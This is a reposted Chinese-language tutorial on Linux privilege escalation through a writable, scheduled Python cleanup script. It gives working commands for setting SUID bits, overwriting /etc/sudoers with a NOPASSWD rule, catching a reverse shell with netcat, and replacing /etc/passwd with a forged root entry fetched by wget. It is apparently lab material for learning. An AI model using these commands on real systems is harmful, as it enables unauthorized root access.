在Linux上通過可寫文件獲取root權限的多種方式


在Linux中,一切都可以看做文件,包括所有允許/禁止讀寫執行權限的目錄和設備。當管理員為任何文件設置權限時,都應清楚並合理為每個Linux用戶分配應有的讀寫執行權限。在本文中我將為大家展示,如何利用Linux中具有寫入權限的文件/腳本來進行提權操作。想要了解更多關於Linux系統權限的內容,可以閱讀這篇文章。好了,話不多說。下面就進入我們的正題吧!

首先,我們來啟動我們的攻擊機並滲透進目標系統直至提權階段。這里假設我通過ssh成功登錄到了受害者機器,並訪問了非root用戶的終端。通過以下命令,我們可以枚舉所有具有可寫權限的二進制文件。

find / -writable -type  f 2>/dev/null | grep -v "/proc/"

可以看到在/lib/log路徑下有一個python文件,我們進入到該目錄並查看該文件的權限為777

1.png

通過cat命令查看該文件內容,這是管理員添加的一個用來清除 /tmp中的所有垃圾文件的腳本,具體執行取決於管理員設置的定時間隔。獲取了這些信息后,攻擊者可以通過以下方式來執行提權操作。

2.png

方法1

我們復制了/bin/sh到/tmp下並為/tmp/sh啟用了SUID。使用編輯器打開sanitizer.py並將“rm -r /tmp/*”中的內容替換為以下兩行:

os.system('cp /bin/sh /tmp/sh') os.system('chmod u+s /tmp/sh')

3.png

一段時間后,它將在/tmp目錄內創建一個具有SUID權限的sh文件,當你運行它時,你將會獲取root訪問權限。

cd /tmp ls ./sh id whoami

下圖可以說明一切!

4.png

方法2

同樣,你也可以將“rm -r /tmp/*”替換為以下內容:

os.system(‘chmod u+s /bin/dash)

5.png

一段時間后,它將為/bin/dash設置SUID權限,並且在運行時會給予root訪問權限。

/bin/dash
id whoami

如下圖所示:

6.png

方法3

在這種方法中,我們在rm -r /tmp/*的位置粘貼了python反向shell連接代碼,並在新的終端中啟動了netcat偵聽。

7.png

如上所述,經過一段時間后,我們通過netcat獲取了具有root訪問權限的反向shell。

nc -lvp 1234 id whoami

如下圖所示:

8.png

方法4

這個方法挺有意思的,在下圖中大家可以看到我當前的用戶是沒有執行sudo命令的權限的。那我們就想辦法讓自己成為suoders文件成員。

9.png

同樣,我們將“rm -r /tmp/*”替換為以下內容:

os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')

10.png

過一段時間后,當你輸入“sudo -l”命令時,你會注意到,它已成為了sudo用戶的成員。此時我們只要輸入“sudo bash”就可以獲取root訪問權限。

sudo -l sudo bash id

方法5

我們知道passwd在任何類linux的系統中都扮演着非常重要的角色,一旦攻擊者有機會可以修改此文件,那么它將會成為一種特權提升的動態方式。

同樣,我們也不會忽視這一點,使用cat命令讀取etc/passwd文件。

在這里你可以觀察到用戶名為nemo記錄的高亮條目,根據我的猜測UID:1000 & GID:1000表示它應該是管理員組的成員。

但我們的目標是通過編輯nemo記錄,使其成為root組的成員。因此,我們選擇並復制etc/passwd文件內的所有記錄,然后將它粘貼到一個空的文本文件中。

11.png

然后在一個新的終端中使用openssl生成一個加鹽密碼並復制。

openssl passwd -1 -salt abc 123

12.png

現在將上面復制的加鹽密碼粘貼至用戶nemo記錄條目中的“X”處,並且將UID&GID更改為0,如圖所示。操作完成后,將文本文件保存為“passwd”,將該文件傳輸至目標系統,它將覆蓋原始passwd文件的內容。

cd Desktop python -m SimpleHTTPServer 80

13.png

同樣,將“rm -r /tmp/*”替換為以下內容:

os.system(‘chmod u+s /bin/cp)

一段時間后,它會啟用/bin/cp的SUID位以復制任意文件。

14.png

現在將被你修改過的passwd文件下載至目標系統的/tmp目錄中。讓我們來檢查一下/bin/cp是否啟用了SUID位,然后使用cp命令將修改的passwd文件復制到/etc/passwd中,這將覆蓋原始passwd文件的內容。

cd /tmp
wget http://192.168.1.103/passwd ls -al /bin/cp cp passwd /etc/passwd

15.png

現在,我們鍵入以下命令查看修改內容是否已在passwd文件中生效。

tail /etc/passwd

可以看到修改內容已成功寫入!

16.png

執行以下命令獲取root訪問權限:

su nemo password 123 whoami

17.png

*參考來源:hackingarticles,FB小編 secist 編譯,轉載請注明來自FreeBuf.COM


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM